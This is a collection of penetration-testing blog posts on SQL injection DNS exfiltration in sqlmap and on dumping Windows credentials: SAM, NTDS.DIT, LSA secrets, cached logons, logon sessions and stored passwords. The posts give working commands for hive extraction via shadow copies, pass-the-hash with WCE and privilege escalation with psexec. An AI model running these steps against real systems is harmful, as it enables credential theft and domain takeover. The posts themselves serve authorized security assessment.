Bernardo Dag

Data retrieval over DNS in SQL injection attacks

2012-06-13T12:49:00.001+01:00

We have recently implemented data retrieval over DNS in sqlmap. This data exfiltration technique adds up to the six existing techniques already implemented: boolean-based blind, time-based blind, full UNION, partial UNION, error-based and stacked (nested) queries. It is supported on Oracle (running either on UNIX/Linux or Windows) and Microsoft SQL Server/MySQL/PostgreSQL (running on Windows).

The technique can be tested for and used by providing sqlmap with the --dns-domain switch following a hostname that resolves over the Internet to the machine where you are running sqlmap from – you do not need to run your name server daemon so you can use a freely available DynDNS or similar solutions: sqlmap starts a fake DNS server on 53/udp so you need to run it with uid=0 privileges and handles the DNS requests from the target DBMS (actually from the DMZ’s DNS server misconfigured to resolve Internet hostnames) automatically.
In cases where the target parameter is vulnerable and exploitable by either of the blind techniques or both of them, then sqlmap will test for DNS exfiltration too and prefer it over the blind techniques as it is much faster. Needless to say that both error-based and UNION based techniques are preferred if identified exploitable.

The paper and slide-deck presented recently at PHDays conference in Moscow, Russia are available on my fellow sqlmap developer's Slideshare page:

Data Retrieval over DNS in SQL Injection Attacks paper.
DNS exfiltration using sqlmap (particularly slide 12 onwards if you plan on using sqlmap for this purpose).

I recommend you all run always sqlmap latest development version from its Subversion repository:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devcd sqlmap-devpython sqlmap.py -h

You can follow the sqlmap development on Twitter too, @sqlmap.

Dump Windows password hashes efficiently - Part 6

2012-01-25T23:48:00.000+00:00

Network services authentication credentials

Like LSA secrets, Windows stores passwords in a reversible format elsewhere.

When you login to a network resource like a network share, a proxy server behind NTLM authentication, a database management system, a mail server, etc, you can often instruct your client to save the password, typically by simply ticking the box “Remember my password”.

Behind the scenes, Windows stores this information in the Credential Manager – a single sign-on (SSO) solution that exists since Windows XP. These stored credentials are used to authenticate each time the corresponding network resource is accessed by the user without the need to retype the password.

These passwords are encrypted using the DPAPI syubsystem and can be dumped in clear-text format.
You can also view, edit and add to this password storage. On Windows Vista onwards the Credential Manager is available under Control Panel\User Accounts and Family Safety\Credential Manager or from Control Panel\User Accounts and Family Safety\User Accounts\\Manage your credentials.

Another storage used by Windows for a similar purpose is the Protected Storage. Applications like Internet Explorer and Outlook Express store the email account password in this storage, where they do not opt to store in the Credential Manager. The passwords stored in the Protected Storage are encrypted using the CryptoAPI functions and the key is derived from the user's password therefore they can be dumped in clear-text format too.

Third-party software like Chrome, RealVNC Client, Thunderbird and others store passwords to websites in their own format. Some tools store them within the registry, some use the Windows API and store them in the Credential Manager or the Protected Storage and others in files. Regardless, all these credentials are stored in a reversible format, publicly documented or not, they can be dumped in clear-text like Credential Manager and Protected Storage passwords.

Dump Credential Manager

The methods to interact with the Credential Manager is documented by Microsoft and implemented in a number of tools able to dump these credentials.
NirSoft’s Network Password Recovery (netpass) is my first choice. It is one-executable only tool and reliable. Make sure you run the 64-bit version on 64-bit architecture.
Cain & Abel can also dump the Credential Manager efficiently, however it only works locally not remotely so you should better avoid it unless installing new software is permitted onto the target machine.
Passcape's Network Password Recovery, not to be confused with the namesake tool from NirSoft, also works well, but the trial version only displays the first three characters of the dumped passwords.
Avoid Metasploit own post-exploitation module windows/gather/credentials/enum_cred_store - it has always crashed regardless of the target Windows version.

Dump Protected Storage

NirSoft's Protected Storage PassView (pspv) is my first choice. It is one-executable only tool and reliable.
Another tool to consider is carrot, a bundle of other tools (primarily from NirSoft), good to dump Protected Storage credentials.
Avoid fgdump as it fails to dump the protected storage.

Dump third-party software stored credentials

NirSoft has a vast collection of tools to dump third-party software stored credentials. Many of these are bundled in one-executable only tool, carrot.

If you have got a Meterpreter shell onto the target system, Metasploit is handy to dump third-party software stored credentials as it has numerous post-exploitation modules for this purpose. Some are pretty much reliable, others are in beta and often crash.

Threats posed by network services authentication credentials

During an internal infrastructure assessment it is likely that you are able to own a workstation before a server.
When this occurs, collecting information about what is the role of the machine within the infrastructure is a crucial step to successfully compromise the overall network. In cases where the machine is an employee's workstation used daily, chances are very high that he uses it to access his corporate email, internal web sites, corporate proxy and other services. If so, chances are even higher that the user has ticked the "Remember my password" entry, everywhere.
Having access, even as a low-privileged user, to these corporate systems "for free" is priceless and useful in your run to extend your control over the network and demonstrate to the customer how even the average and most insignificant workstation far from the DMZ need to be taken care of systematically.

Often corporate email credentials, network shares passwords and others are reused by users across different services if not the domain user account too so being able to dump the credentials in clear is high value during a penetration test.

I have added these tools to the spread-sheet. Feedback is welcome!

Dump Windows password hashes efficiently - Part 5

2011-12-28T00:38:00.001+00:00

Logon sessions

Windows stores in memory information about every current and past successful logon. These are called logon session. This information includes the username, the domain or workgroup name and both the LM and NT password hashes.

Every time a legitimate user logs onto a Windows system, the Local Security Authority (LSA) stores in memory this information. This happens regardless of the logon type: interactive logon to the console or remote logon via Remote Desktop Protocol (RDP).

The image below from Hernan Ochoa illustrates this concept:

Windows NT logon and authentication model

The same information is stored for RunAs processes and services running as specific users. In the latter case, the clear-text password is stored in memory and can be retrieved in LSA secrets anyway.
Exception being network logons, for instance over SMB or HTTP; these do not get stored because the NT/LM hashes never actually reach the server. A challenge-response mechanism is used for authentication.

This sensible information is kept in memory because it is used for Single Sign-On (SSO) purposes.
SSO technology is extensively used in Windows network, particularly within domains. This allows, for instance, a user logged into a certain system of the domain to access remote shares, shared resources like printers and HTTP proxy protected by NTLM authentication without the need to type in his clear-text credentials each time: Windows deals with the authentication for him transparently over the network by providing exactly what is stored in memory: username, domain/workgroup and password hashes.
This authentication mechanism works because nowadays nearly all Windows services accept authentication with NT/LM hashes as an alternative to clear-text password. Exception being Remote Desktop Protocol.

Dump logon sessions

Logon sessions can be dumped given you have an administrative shell onto the target. There exist two techniques to dump logon sessions: code injection into lsass.exe process and reading of LSASS memory.

There are several tools that can dump logon sessions: msvctl from TrueSec is a safe choices for Windows XP/2003 and is limited to 32-bit architecture. The updated version of gsecdump can dump logon sessions regardless of Windows version and architecture too. More recent tools include another nice piece of code from TrueSec, lslsass: this tool has been designed specifically for Windows Vista onwards and delivers reliable results regardless of the architecture.

The most well known tools to manipulate Windows logon sessions are Windows Credentials Editor (WCE) and its predecessor, Pass-The-Hash Toolkit (PTK). Both are the result of thriving research by Hernan Ochoa, currently the founder of Amplia Security. His presentations include:

Pass-The-Hash Toolkit for Windows: Implementation & use presented at Hack In The Box Security Conference in Malaysia on late 2008. Despite being a dated presentation, it offers insight on the history and techniques used in post-exploitation scenarios, specifically focusing on the more generic Pass-the-Hash technique and its implementation in the Pass-The-Hash Toolkit.
WCE Internals presented at RootedCon in Madrid on early 2011. This presentation explains the inner workings of WCE including how Windows store credentials in memory pre and post Windows Vista.
Post-Exploitation with WCE presented on July 2011. Simple and effective high-level presentation with test cases. I recommend you reading this presentation before anything else if you are totally unfamiliar with logon sessions and pass-the-hash technique. Another good read is the tool's FAQ page.

Between these two tools, I prefer WCE for a number of reasons: it is one single executable, it is safer than all the other tools as it is the only one to implement the reading of LSASS memory technique as an alternative to performing code injection and it works across all Windows versions and on both architectures.

For the purpose of this post, I have set a Windows Server 2003 R2 Service Pack 2 fully patched machine (NetBIOS name: w2k3r2) in the following state:

Local Administrator with a 15-characters long password logged interactively to the console.
Two local users, inquis and foobar, both connected over RDP, respectively using mstsc, the default RDP client on Windows, and rdesktop, a RDP client for Unix/Linux.
A few services, all related to IBM DB2 database management system, running as local administrator, db2admin.

lslsass was deliberately excluded from my tests as it only works on Windows Vista onwards.

All the tested tools were able dump the logon sessions successfully. Follows the output of Windows Credentials Editor:

C:\>wce.exe -l

WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Administrator:W2K3R2:00000000000000000000000000000000:237599E85CF684A6785A12ACD2E24E5C
inquis:W2K3R2:0AC9A586623764E16591BB5472A3AD4A:89F411F435A93044E2E8AA4CEDFE0FBA
foobar:W2K3R2:87DCEB9223BE0E08FD8E74C8CEB3053A:33D807D89B36ACDF2FAB42A361DE0B91
db2admin:W2K3R2:3AE6CCCE2A2A253F93E28745B8BF4BA6:35CCBA9168B1D5CA6093B4B7D56C619B
W2K3R2$:WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

As you can see, these tools dump logon sessions and display the username, domain/workgroup name and LM/NT hashes very similarly to SAM hashes dump tools output. The main difference is that these tools display the domain/workgroup name as domain users can be logged onto the system too as opposed to the user ID field shown by pwdump-alike tools.

The following screen-shot demonstrates the successful dump too:

Dump of logon sessions with Windows Credentials Editor (WCE) on a Windows Server 2003 R2 machine where the Administrator is logged to the console, two users are logged remotely via RDP and one service is running as local user

I realized during my tests that regardless of the method used to close a session, the logon sessions remain in memory. Take RDP connections, either if you disconnect (clicking on the top right X button of your RDP client) or log off from the Start menu, they remain in memory. I have seen this happening on Windows Server 2008 R2 Enterprise Service Pack 1 too. The main difference being that on Windows Vista onwards the logon sessions are erased from memory a few minutes after the user has logged off.

The following screen-shots demonstrate the described behaviour:

Dump of logon sessions following a disconnect via RDP of one user, foobar - his logon session remains in memory

Dump of logon sessions following a forced log off of user's foobar RDP connection - his logon session remains in memory

db2admin logon session also remains in memory despite the relevant services are stopped.

Threats posed by logon sessions

The scenario here is similar to LSA secrets dump and cached domain logon information: you are Local System on a machine part of one or more Windows domains and you want to takeover the domains. There are no traces of domain users' credentials from LSA secrets and the machine does not cache domain logon information.

To extend your control over the domain you can dump the logon sessions. If there is a logon session of a domain administrator, it is game over: impersonate that logon session to spawn a command prompt. This technique is also known as pass-the-hash or logon session stealing.

The command line would look like:

C:\>wce.exe -s <user>:<domain>:<LM hash>:<NT hash> -c cmd.exe

In the new command prompt window, connect over SMB, for instance with Sysinternals' PsExec, to the root domain controller to takeover the Windows domain - Windows will use the impersonated NTLM credentials to authenticate against the domain controller and access will likely be granted as you are now, as a matter of facts, the domain administrator.

Alternatively, if there are no domain administrators' logon sessions, you can still spray the dumped logon sessions' hashes to others machines of the domain exactly the same way you do to verify password reuse across machines with the local users' password hashes: in the event that you have dumped domain users' logon sessions, chances are high that these users are allowed to login to others systems of the network therefore you have an easy way into these.

These systems might be vulnerable to others threats that allow you to takeover the domain from there, so it is definitely worth a try.

Apart from WCE, others tools can also perform pass-the-hash: msvctl and the more recent RunhAsh from TrueSec. I have added these tools to the spread-sheet. Feedback is welcome!

Dump Windows password hashes efficiently - Part 4

2011-12-21T20:08:00.000+00:00

Cached domain logon information

Windows machines can be standalone workstations or part of a Windows domain in the role server or workstation.
When a user logs onto a workstation part of a domain, technically he can either log as a local user or a domain user given that he has the credentials.

When logging as a domain user, three information are required: username, password and domain name. The latter is usually provided as a drop-down menu listing all domains that the system is part of.
Given this information, when the domain user logs onto the system, the provided password is hashed and checked over the network against the domain controller's valid password hash (physically stored within ntds.dit file). This process is handled once again by the lsass.exe process.
LSASS first checks if the domain controller is available. If so, it proceeds with the password hash matching step and, depending on the result, it allows or denies access to the system to the authenticating domain user.

In the event that none of the domain controllers are available, the legitimate domain user would not be able to login onto the system. To avoid this from happening, Microsoft has long ago introduced the cached domain logon information mechanism in Windows.

Definition from Microsoft:

All previous users' logon information is cached locally so that, in the event that a domain controller is unavailable during subsequent logon attempts, they are able to log on [...]

Therefore, when the domain controllers are not available, the domain user can still log onto the domain machine. The only caveats being that he has previously successfully logged and that the system is configured to cache the domain logon information. The following screenshot shows you where this policy is set.

Local Security Policy (secpol.msc) / Local Policies / Security Options / Interactive logon: Number of previous logons to cache (in case domain controller is not available)

You can also read the value of this policy in registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount.

By default Windows XP and above are configured to cache 10 or more domain logon information.
Cached domain logon information is stored in registry hives HKEY_LOCAL_MACHINE/Security/CACHE/NL$X with X being a number. These registry hives are accessible by Local System and tools exist to dump them.

Dump cached domain logon information

Like other hashes, these hashes can be accessed by DLL injection into the lsass.exe process or from the registry files.
For offline dump, copy off the system the registry files SYSTEM and SECURITY: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel, creddump by Brendan Dolan-Gavitt and Windows Password Recovery by passcape can extract cached domain logon information from these files.
Alternatively, there are numerous tools that can dump this by DLL injection into lsass.exe process. On 32-bit architecture you can use the original cachedump by Arnaud Pilon which proved to be reliable also on recent Windows versions, fgdump or PWDumpX.
Unfortunately though, none of the standalone free tools work on 64-bit architecture. In this case, you can rely on Metasploit Framework own post-exploitation module if you have got a Meterpreter shell onto the target system.

Follows the output of cachedump on a Windows system part of a domain:

C:\>cachedump.exe -v
Service not found. Installing CacheDump Service (C:\cachedump.exe -s)
CacheDump service successfully installed.
Service started.
user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal
Service currently active. Stopping service...
Service successfully removed.

Threats posed by cached domain logon information

Similar scenario to LSA secrets dump: you have compromised a machine part of a Windows domain and have got a shell as Local System. There are no traces of domain users' credentials from LSA secrets. Another step to extend your control over the domain? Check if the machine is configured to cache domain logon information as explained above. If so, dump them.

Cached domain logon information cannot be directly used to authenticate to other systems as opposed to NT and LM password hashes. Nevertheless, you can crack them and use the clear-text password to authenticate to machines part of the relevant domain. I will cover password hashes cracking in depth in another blog post.

Conceptually, caching domain logon information is effective and solves network administrators' headaches to deal with domain users logons when the domain controllers are under maintenance or unavailable for whatever reason. Although, looking at it with the security lens, it clearly poses a security threat.

I have added these tools and improved the spread-sheet. Feedback is welcome!

Dump Windows password hashes efficiently - Part 3

2011-12-20T20:49:00.000+00:00

Password history

In the previous two posts of this series, I discussed how to dump Windows local users' password hashes (SAM) and Windows domain users' password hashes from domain controllers (ntds.dit).

When the password policy setting is configured to enforce password history, Windows stores a certain number of used passwords before an old password can be reused. The following screenshot shows you where this policy can be set.

Local Security Policy (secpol.msc) / Account Policies / Password Policy / Enforce password history

By default on workstations, this value is set to 0 and on domain controllers it is set to 24. This means that when dumping domain users' hashes from active directory's ntds.dit file, there are high chances to dump also the password history allowing you, during the password cracking phase, to recognise patterns used by the target users.

Despite not being current password hashes, pattern identification can lead to further attacks. For instance, ease of guessing passwords used against standalone services at later stages of your post-exploitation. Therefore, never underestimate the added value provided by dumping and cracking the password history.

Many of the tools introduced so far can dump the password history: Cain & Abel, PWDumpX along others. pwhist from Toolcrypt is also a valid option.

LSA secrets

LSA secrets is an area in the registry where Windows stores important information. This includes:

Account passwords for services that are set to run by operating system users as opposed to Local System, Network Service and Local Service.
Password used to logon to Windows if auto-logon is enabled or, generally, the password of the user logged to the console (DefaultPassword entry).

LSA secrets are stored in registry hive HKEY_LOCAL_MACHINE/Security/Policy/Secrets. Each secret has its own key. The parent key, HKEY_LOCAL_MACHINE/Security/Policy, contains the data necessary for accessing and decoding the secrets.

Dump LSA secrets

As per SAM hashes, the LSA secrets can be accessed by DLL injection into the lsass.exe process or from the registry files.
If you are Administrator and the target system is used in production, I recommend you to choose the safe path and copy off the system the registry files: SYSTEM and SECURITY: you can use the legacy registry hive copy (reg.exe/regedit.exe) or the volume shadow copies technique illustrated in the first post. Cain & Abel can extract LSA secrets from these files.
Alternatively, there are numerous tools that can be used to dump LSA secrets by injecting into lsass.exe process: gsecdump has proved to be the most reliable for LSA secrets, working across all Windows versions and architectures. On 32-bit architecture, the original lsadump2 has proved to be good too. Despite my expectations, the two NirSoft tools (LSASecretsDump and LSASecretsView) have failed to dump services' account passwords, regardless of the architecture.

Regardless of the technique used, the passwords extracted are UTF-16 encoded. This means that they are in clear-text as opposed to SAM hashes. You can read a detailed description of the LSA secrets format here by Brendan Dolan-Gavitt.

The following screen-shot shows the output of gsecdump on a Windows Server 2003 machine running IBM DB2 and PostgreSQL. Both database management systems run as Windows local users:

Output of gsecdump.exe -l to dump LSA secrets

Threats posed by LSA secrets

Now, imagine that you have compromised a server part of a Windows domain, you have got a shell as Local System. If you want to extend your control over the network perimeter, one of the viable ways is to verify if any service runs as real operating system users and, if so, extract their clear-text password from LSA secrets.
You can run services.msc from Start / Run and sort the entries by Log On As column to check this quickly. The following screen-shot demonstrates this:

Services running as local users on Windows

Obviously, the built-in sc.exe command can do the same as well as other less known tools.
It is common to identify enterprise software like Veritas Netbackup, Microsoft SQL Server, Microsoft Exchange and others running as real users. More dangerously, sometimes system administrators opt to run services as domain users, if not domain administrators.
This is clearly wrong and poses a high threat to overall security of the target Windows domain because, as an attacker, you can dump the LSA secrets and use the clear-text domain administrator password to login to the root domain controller and takeover the Windows network.

I have added these tools and improved the spread-sheet recently. Feedback is welcome!

Dump Windows password hashes efficiently - Part 2

2011-12-16T00:24:00.000+00:00

Conclusions on Windows Security Account Manager

In the previous post of this series, I briefly explained what the Windows Security Account Manager (SAM) is, how to dump Windows local users' password hashes from SAM having physical access to the target system or following a remote compromise of the machine, post-exploitation.
Remotely, there exist three possible techniques: legacy, volume shadow copies and in-memory dump. Lastly, I highlighted the most widely used tools for the in-memory hashes dump and I collected and released them in this spread-sheet along with other tools that I will discuss later.

I want to reiterate the following concept: given file transfer ability between your machine and the target system, always prefer to copy the SAM and SECURITY files over from the target and extract the password hashes offline afterwards.
Although, this safe approach to password hashes dump does not guarantee that you are going to obtain all Windows local accounts' hashes. If you suspect that this is case, you will have to dump the hashes via in-memory dump and merge the results. Odd, but I have seen this happening quite a few times already and I am still discussing standalone Windows workstations, not part of a Windows domain.

Preferred tools

Personally, my first choice for standalone SAM hashes dump is pwdump7: it works on all Windows version from 2000 on both 32-bit and 64-bit systems. However, this tool does not perform an in-memory dump and could miss out hashes. I always run gsecdump along with pwdump7 to cover both techniques across all Windows versions and architecture and carefully launched once at a time do crash the LSASS process.

When I have got a Metasploit Meterpreter shell onto the system, I rely on the post-exploitation module smart_hashdump by Carlos Perez, falling back to its predecessor post-exploitation module hashdump when it fails.

Active Directory

Definition from Wikipedia:

Active Directory serves as a central location for network administration and security. It is responsible for authenticating and authorizing all users and computers within a network of Windows domain type, assigning and enforcing security policies for all computers in a network [...] when a user logs into a computer that is part of a Windows domain, it is Active Directory that verifies his or her password [...]

This definition comes into play when you have compromised a system part of a Windows domain. In order to quickly extend your control over the whole domain, the goal is to compromise the root domain controller. If you are within a child domain, the final goal is to achieve Enterprise Domain Administrator level access onto the root domain controller of the Windows forest's parent domain. There are plenty of resources on the Internet discussing domain escalation and this is out of the scope of this post series. A blog post that summarizes the best techniques and goes straight to the point is written by pentestmonkey.net. Alternatively, you can pass the local users' hashes obtained from your entry point machines to keimpx and spray them against the domain controllers: if the system administrator reuses the same local Administrator password across all machines, you are in!

Regardless of how you have compromised a domain controller, preferably the root domain controller as it is the first to get updated with changes to user accounts, the important is that you have got an administrator (local or domain) shell onto it.

Database file NTDS.DIT

The goal now is to dump the domain users' password hashes. These are stored, along with nearly all the information that is accessible in the Active Directory (user objects, groups, membership information, etc), in a binary file, %SystemRoot%\ntds\NTDS.DIT.

This file is locked by the system. You can use the volume shadow copies technique illustrated in the previous post to copy it along with the SYSTEM file over to your machine.
Alternatively, use the ntdsutil snapshot facility introduced in Windows Server 2008. It will create a snapshot of the active directory database allowing you to copy ntds.dit and SYSTEM file. This technique is detailed on a Microsoft TechNet article.

Extract hashes from NTDS.DIT

You can use the passcape's Windows Password Recovery tool to extract hashes from ntds.dit.

Alternatively, you can use a couple of tools (ntds_dump_hash.zip) developed by Csaba Barta and documented in his paper titled Research paper about offline hash dump and forensic analysis of ntds.dit. These tools are used to:

Extract the required data from ntds.dit: esedbdumphash.
Decrypt the hashes and interpreting other information regarding the user account: dsdump.py, dsdumphistory.py, dsuserinfo.py.

Download and compile the tool:

$ wget http://csababarta.com/downloads/ntds_dump_hash.zip
$ unzip ntds_dump_hash.zip
$ cd libesedb
$ ./configure && make

Use esedbdumphash to extract the datatable from ntds.dit:

$ cd esedbtools
$ ./esedbdumphash -v -t /tmp/output <ntds.dit file>
$ ls -1 /tmp/output.export/
datatable

Use dsdump.py to dump the hashes from the datatable file using the bootkey (SYSKEY) from the SYSTEM hive:

$ cd ../../creddump/
$ chmod +x *.py
$ ./dsuserinfo.py /tmp/output.export/datatable
$ ./dsdump.py <SYSTEM file> /tmp/output.export/datatable --include-locked --include-disabled > domain_hashes.txt

Like standalone machines, you can use the in-memory technique too to dump the domain users' hashes. The tools are the same and work equally. Just be cautious when injecting into the LSASS process of a domain controller: in the worst case scenario, you will have to reboot an infrastructure-critical server.

I have added these tools and improved the spread-sheet.

Updates on January 4, 2012

During December 2011, Csaba Barta has dug some more into NTDS.dit structure and as a result he has developed a new framework called NTDSXtract to extract information from database tables extracted with libesedb from ntds.dit file: both tools now support 64-bit derived database files too.

Download and install the latest release of libesedb.

Extract the database tables from ntds.dit:

$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>
esedbexport 20111210

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

$ ls -1 /tmp/ntds.dit.export/
datatable.3
hiddentable.4
link_table.5
[...]

Use NTDSXtract to parse the datatable and extract users' information, including password hashes and history:

~/NTDSXtract 1.0$ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output

Use this small script that I have put together to process the output of NTDSXtract's dsusers.py into a "pwdump-alike" penetration tester's friendly format:

$ python ntdstopwdump.py /tmp/ntds.dit.output
Administrator:500:NO PASSWORD*********************:09b1708f0ea4832b6d87b0ce07d7764b:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
[...]

Dump Windows password hashes efficiently - Part 1

2011-12-14T17:07:00.001+00:00

Windows Security Account Manager

Slightly modified definition from Wikipedia:

The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 7. It stores users' passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

Generally, dumping operating system users' password hashes is a common action following a compromise of a machine: getting access to the password hashes might open the doors to a variety of attacks including, but not limited to, authenticate with the hash over SMB to other systems where passwords are reused, password policy analysis and pattern recognition, password cracking, etc.

Depending on the type of access that you have got to the target, you can retrieve the password hashes from SAM in different ways.

Physical access

Given physical access to the system, typically during a laptop assessment or a successful social engineering engagement, the preferred way to safely dump the password hashes is to power off the machine, enter the BIOS menu at power-on time, review the boot order to allow boot from the optical drive and USB drive before local hard-disk, save the settings and reboot the system with your favourite GNU/Linux live distribution CD or USB stick. Two widely known tools to dump the local users' hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2:

bkhive - dumps the syskey bootkey from a Windows system hive.
samdump2 - dumps Windows 2k/NT/XP/Vista password hashes.

These tools are generally included in many GNU/Linux live distributions. If they're not, make sure to bring a copy of them with you.

Usage:

# bkhive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:
bkhive systemhive keyfile

# samdump2
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Usage:
samdump2 samhive keyfile

Example of retrieving the SAM hashes from a Windows partition /dev/sda1:

# mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt

In the event that you have not got bkhive or samdump2 with you, you can fall-back to copy the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and import them to any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools.

Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users' password hashes, some smart people have came up with innovative approaches:

BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the "create CD from ISO image" feature of your preferred CD burning software to create a bootable SysRq CD.
Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows to log into a linux system as root user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password.

Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user's credentials.

Post-exploitation scenario

The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals' PsExec utility:

C:\>psexec.exe -i -s cmd.exe

Although, there are several other techniques too, but this is outside of the scope of this post.

Legacy techniques

On Windows NT and Windows 2000 systems you can use Ntbackup utility part of the MS-DOS subsystem: Backup the system state into a file locally on the machine you have compromised, then using Ntbackup again, restore the system state stuff to a local directory without preserving the security. Once complete, you will have the SAM and SYSTEM files. You need about 280Mb for the initial backup - typical for a Windows 2000 with current service packs and hot fixes.
On modern releases of Windows, you can use Wbadmin, an alternative to Ntbackup.

Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:

C:\>regback.exe C:\backtemp\SAM machine sam
C:\>regback.exe C:\backtemp\SYSTEM machine system

If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exe. Using reg.exe:

C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully

Using regedit.exe:

Execute regedit.exe from Start / Run prompt.
Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
Change the Save as type setting to Registry Hive Files and save as SAM.
Same steps with SYSTEM hive.

Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. Although this directory contains outdated copies of the original C:\Windows\System32\config\ files so it might not reflect the current users' credentials.

Volume Shadow Copies technique

This technique is fairly recent and was first illustrated by Tim Tomes. It consists of abusing the Volume Shadow Copies functionality in modern Windows operating systems to access locked system files like C:\Windows\System32\config's SAM and SYSTEM and others.

You can use the Volume Shadow Copy Management command line interface, vssown, to leverage this technique as follows.

List shadow copies:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

As expected, no shadow copies initially.

Verify the status of the Volume Shadow Service (VSS):

C:\>cscript vssown.vbs /status
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Stopped

C:\>cscript vssown.vbs /mode
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] VSS service set to 'Manual' start mode.

In this case, once we are done, we need to restore it to the initial state (Stopped).

Create a new shadow copy:

C:\>cscript vssown.vbs /create
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to create a shadow copy.

Verify that the shadow copy has been created:

C:\>cscript vssown.vbs /list
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

SHADOW COPIES
=============

[*] ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}
[*] Client accessible: True
[*] Count: 1
[*] Device object: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] Differnetial: True
[*] Exposed locally: False
[*] Exposed name:
[*] Exposed remotely: False
[*] Hardware assisted: False
[*] Imported: False
[*] No auto release: True
[*] Not surfaced: False
[*] No writers: True
[*] Originating machine: LAPTOP
[*] Persistent: True
[*] Plex: False
[*] Provider ID: {B5946137-7B9F-4925-AF80-51ABD60B20D5}
[*] Service machine: LAPTOP
[*] Set ID: {018D7854-5A28-42AE-8B10-99138C37112F}
[*] State: 12
[*] Transportable: False
[*] Volume name: \\?\Volume{46f5ef63-8cca-11e0-88ac-806e6f6e6963}\

You need to take note of the Device object value for the next step and the ID for the cleanup step.

Pull the following files from a shadow copy:

C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .C:\>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .

You have just copied over SAM and SYSTEM files from the shadow copy to the C:\ root folder.

Cleanup:

C:\>cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Attempting to delete shadow copy with ID: {D79A4E73-CCAB-4151-B726-55F6C5C3A853}

Eventually, restore to original Stop status:

C:\>cscript vssown.vbs /stop

Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

[*] Signal sent to stop the VSS service.

In-memory technique

